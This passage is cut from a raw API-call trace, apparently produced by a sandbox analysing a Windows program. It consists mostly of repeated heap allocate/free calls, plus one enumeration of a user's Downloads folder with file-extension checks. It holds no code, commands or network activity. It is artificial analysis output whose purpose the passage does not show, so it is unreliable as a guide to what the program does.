hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0236.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0236.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.936] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="Downloads\\" [0236.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95a58 [0236.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.936] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0236.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0236.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95a58 | out: hHeap=0x620000) returned 1 [0236.936] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0236.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.936] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0236.936] PathFindFileNameW (pszPath="") returned="" [0236.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.936] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0236.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.936] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0236.936] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0236.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0236.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.937] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned=".ini" [0236.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0236.937] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0236.937] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0236.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0236.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cbd8 | out: hHeap=0x620000) returned 1 [0236.937] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0236.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cbd8 [0236.937] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0236.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0236.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0236.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0236.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0236.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0236.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0236.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0236.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0236.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0236.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0236.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0236.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0236.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0236.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0236.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0236.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 